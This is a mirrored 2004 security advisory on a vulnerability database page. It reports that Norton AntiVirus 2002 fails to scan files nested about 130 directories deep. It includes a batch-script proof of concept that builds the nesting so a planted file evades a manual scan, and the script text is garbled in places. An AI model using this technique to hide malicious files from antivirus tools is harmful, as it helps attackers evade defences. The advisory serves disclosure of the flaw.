Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:6098
HistoryApr 19, 2004 - 12:00 a.m.

Norton AntiVirus nested file manual scan bypass.....

2004-04-1900:00:00
vulners.com
29
JSON

Product Version: Norton Antivirus 2002 (~Only tested On…~)
Risk Impact: Medium
Vendor Status: No responce!

Summary:

If you manage to inject a file in the sub-directory(s); beyond windows OS
can create
normally, [ say in 130 'th + sub-directory at c:\…\…\…\…upto 130'th

] NAV fails to scan the NESTED FILE. Indeed, it's more a windows restriction
in
accesing the nested file than a ANTIVIRUS flaw. Other antivirus product
should
also suffer the same. .PLEASE VERIFY.

=-------CUT----------=
@echo off
rem Bipin Gautam [hUNT3R]
rem [http://www.geocities.com/visitbipin] * [http://www.01security.com]
echo »
echo ************************************************
echo -( For a harmless test… you can use,
echo http://www.eicar.org/anti_virus_test_file.htm )-
echo ************************************************
pause
cdc:
cd:hUNT3r
md 1
cd 1
if not errorlevel 1 goto :hUNT3r
cd…
rmdir 1
md X
cls
echo ***************************************************************
echo Now you can inject any file inside the folder 'X' which is inside
echo 120'th sub-directory of 'c:\1' [ i.e c:\1\…\…\…[120'th
dir]…\X\ ]

echo Note: The file you are moving to'c:\1\…\X\' should only contain
echo '1' char. file name, say: '1.exe' or '2.exe' or 'a.exe' etc…
echo not as '123.not' 'qwert.hak'
echo …
echo So, ARE YOU DONE!?
echo …
echo After this batch script is terminated, you'll
echo find the file you ^just copied^ inside c:\1\…\X\
echo now in c:\3\3\3\3\3\1\1\1\…[130' th dir]…\Xecho mmm…
Then have
a manual scan of c:\3\ Any file you
echo have put inside the dir. 'X' can't be detected by NORTON Antivirus
anymore!!!
echo ***************************************************

pause
cdmd 3\3\3\3\3\3\3\3\3\3cdxcopy /E /I c:\1\. c:3\3\3\3\3\3\3\3\3\3exit

=-------CUT----------=

Disclaimer: The information in the advisory is believed to be accurate at
the time
of printing based on currently available information. Use of the information
constitutes
acceptance for use in an AS IS condition. There are no warranties with
regard to this information. Neither the author nor the publisher accepts any
liability
for any direct, indirect or consequential loss or damage arising from use
of, or reliance on this information.

Use MSN Messenger to send music and pics to your friends
http://www.msn.co.uk/messenger

JSON